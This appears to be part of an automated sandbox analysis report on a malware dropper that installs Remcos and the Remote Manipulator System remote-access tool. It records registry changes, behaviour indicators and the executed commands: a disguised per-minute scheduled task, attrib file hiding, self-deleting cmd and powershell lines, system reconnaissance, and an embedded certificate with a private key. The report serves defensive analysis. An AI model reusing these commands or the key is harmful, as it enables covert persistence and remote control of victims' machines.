| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223730313230223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c465154553554323936515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c5674566e52694d314a735355557861474a746248646b5633686f5a45633565556c47546a566a4d314a73596c524661553144515564424d565646515864335767705662565a30596a4e5362456c464d576869625778335a466434614752484f586c4a526b3431597a4e5362474a5551575647647a423554577042654531715658684f524646345456526159555a334d48704e616b4634436b31715458684f52464634545652615955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73553170584d585a6b5231566e5646644764574659516a454b596b64474d47497a535764564d3278365a456457644531545358644a51566c45566c46525245524362464e61567a46325a4564565a315258526e566857454978596b64474d47497a535764564d3278365a4564576441704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a3074445156464651585a584e554a6e4d556b344f465246614374794e30644465576b7a436a6772526e6c6b6554565255554a56623349314e57705363455a7a55476c48654845354d6d3433626b6f3263545a36596d5a7852575269615770475347314d6347597a596d5a4a62486778566d5a43646c644e5254494b54475532617a426963303174546c5a525a32524361316f3152576435545568365658524a656e70554d6c6c4e5a584a315346426959584234596e4649646b7376566b4a4255485a685a6d3177525856315a6c41724c776f7a595870574e6a644952586f764e6b31495a6a685954474a484d57744e4d6e64785553744b5232745156586f3359577055554646484e6d687353564e76576a645a4d6d4e36516a4e465a697477515452784e6b744b436a5a35627a63316547743151793959537a567961573975645568585655524f4e6d4a5362545a794f484d334e7a644c516b73726557355262316c454e537469647a557264564231616d35564d556454626c6f316155554b4d6b6c76554441796247704964557055556b396e4e6b6f7664474e485157784a593352546130777865453146654746514d6c68444f484130645770494f44553555307874626a5257536d523152584579644468716141707655556c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b465251554a546545303064555251654642336355637964537435546c6f3265584a585132553157564d31436d5a745a4846564d797430636d3573626e7058526d5176566d5a6d4f446b3354464650645531515154564264564e58596b686a4f5564506555685456464e4e4c3239544d334d775247524652697449656b78784d456f4b5457706a5356644c546d6c4e6333566a4d33704e52466c3259325a714d4578755556704c556d6b77546d3559596e424c63564d35626b466a59556c784d445245636e527061305a7a4d464d324c334d78546b52595a4170336431465065537456615568574d466f764e7a644e53585a7654335a304e6b395a4e31463652546c5a554452464d6b467a5a585a4463797476545556685446686d5632553355466c464d3234785169397a63545643436b316e64557079555568454e6d4e52616b74545a44466154326c764d31706f4e6c4a47556b70355a4535434e79396e4e6a6c68616c6c6c5a485a7965567071646d4e7264315a344e47356c55546b724b304d305a48554b65574e745957565463584e6a627a4a45564570465647646953304972576e4e71553074584d47396f516a5a6a636b683351337035535764525646687a646a56535648704264456c5a5432514b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a535556325a306c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b746e6432646e553274425a3056425157394a516b4652517a6c696130644556577036654531545344594b646e4e5a5445744d5a6e6f3057456f7a5447784351555a5461585a7562553548613164334b306c695233497a59575a3159323578636e4a4f64437476556a4631533031565a566c316243396b644468705745685756676f34527a6c5a6431525a6444647856464a3164336c5a4d565a44516a4248556d35725530524a64325a4f557a427155453551576d64344e6e5530597a6c30635735476457396c4f484935565556424b7a6c774b324672436c4d324e5467764e79396b636b3559636e4e6a564641766233646b4c33686a64484e6956314636596b4e775244527259564535564642306355354e4f554669635564566145746f626e5271576e704e53474e534c7a594b61305270636d3976626e4a4c616e5a7552314d3054446c6a636d313153326c6c4e4752615555307a63485248596e463265587032646e4e76525849335332524461476451626a5632524734324e43733254325255565170615332527562556c5557576c6e4c3152685630316c4e47784f52545a45623234724d58645a5131566f6554464c55585a5952586455526d3876576d4e4d655735704e6b316d656d3478535856685a6d685662444930436c4e7959544e355430646f5157644e516b464252554e6e5a305642576a526c597a4277544752794f486777616a68424e45744f4d4731515232395a656e6f315233466b4f5731716556517a61564a6d644731794f54634b61465236644770526356464f54575654576e524556474a31546d7868525764544e6c704661314275624752324e486868636e4178595746536432316f52306842596e4934567a6832646d4e43513170365647395851676f305469387857546c54623063315156566b4d48644d52556c7a596d686953314e46646c5934556b39475154427a576e6c4b54334932516a684f64316834533168545244524e5a32784363574e4b56464a6a54553975436e46774e455a5662554a535a4570715254465851575a6e4e477877643341784f57677852464e554e5574725130647257577856614652484b304a51624551765458523262475648596d564e536b566f55576332576b514b4e445a6a5a474a306245354d526a686f537a46316230686e616d314b5a6b785559575233547a5677616a46694e32566f4e316b786247356a5132467452554a344c3370714d307044596e565253336c485646646c62776f3261326c6a52564d7a546b493161454933656c4979536e4578626c646d4d6e4e6c636d4933526c6c5257554e50596d3944543364534e46464c516d6452524452344d31637662484a564c7a46535969383251316451436a42705a6939694d305a56526e64505a6b6471517a4a6f524870594e6b393054454e6f64486c7753474673546e4248613052764e48527261307047595670324d6c5271536c6450566a424e62473535634464685531634b4b3159764e6c4a324e6a4a554e6e42705a45743363484179626d686a5347466d55327833596c4a42646d64584e446c595257773265554e694b3267785630457755465977656d35765130737964486b336348526d5551706961566f785a6b4e4f6556703454335a734d566c4c566a5a6f616d343351556447555574435a314645517a646a4f545a54626a6378613368756457647853474e4d516e493462456c6d53484a56533256456432777a436d5a6c64324a6e4c3055774c306454576d746c546c52475333646b4e5868424d56646a5245786f5a45464861445a724d336c315a6c5630576a6734643277334d327872626d317a4d325972554645344f5739736358554b525842724b323171566e686b6154463354446c7a4e6d39785a555a4c5455706e654574705533565064456452556d52725a6c45724b304e5662586b7265577458566a526d4f45313254476c49526e6453626c6c5061676f72614851796379394d4f46685253304a6e555551775956424756484e79635573315933706a65574a5164466c7061553574567a426961326c7063584a4e4e576b305a6c427a623368615679744c4d464e7862565630436a463661584673645739364f54466b535668765458524d6345686f61554e5956574e6f6433703661474d765a7974334e55354963565a7561484a724f444d345758685554553974636b525164575a34574768556158514b6556466151556c32623070784b7a5279524770705a6a4a6f5233637a64544a745a6c684e5532394e4d6e6c4b61565972613356464e464e6d516d4a5052455135634552554e4374354b336c4c555574435a30686e6351706f5247356c564530764d445642635535354d58686e59304d314c30686e61336851556a4257536d5976593367334d3246764f484a4955564272547a4d7a56334a444f46425156334e5857544172634770556253744a436b6442516b5976535459335a6b5251534731355745564b4d454e78533068484e57744961585268626e526d51324e304d6a5236566c51315a3151764e6a5256526b6476536c524e65577058593368726230644362314d4b54456478546c5671555652764e314a4d59335a51544374424b7a5247546c526f53307836554642765645743256444533516a4e4e5a45467652304a4253544a35614645725547464a616a64685a6e684855586836564170305555566156316c6e62537379536974545369394864464a796132643153465a4a61326c6e4e4546566353733361574636636e646f624778705a6c6c68566d31346443747059554a4f55476332556d786856566330436b6831554770435a5552745445566a5745396153585a4c6132396d6158527752484a78556e5133625642764e304a4c62554e5664557051644756734d32733053554e4b596d683665564a496345356853555a706448454b566a42326545705a62454e4263574533626b78726147564c51585a4752575a31436930744c533074525535454946425353565a42564555675330565a4c5330744c53304b3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting\LastCrashSelfReportTime = "133785014207490496" | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters | C:\Windows\SysWOW64\regedit.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Users\Admin\AppData\Local\Temp\a\client.exe
"C:\Users\Admin\AppData\Local\Temp\a\client.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe
"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
C:\Windows\system32\mode.com
mode 65,10
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\FCTR16PHVKF3" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\curl.exe
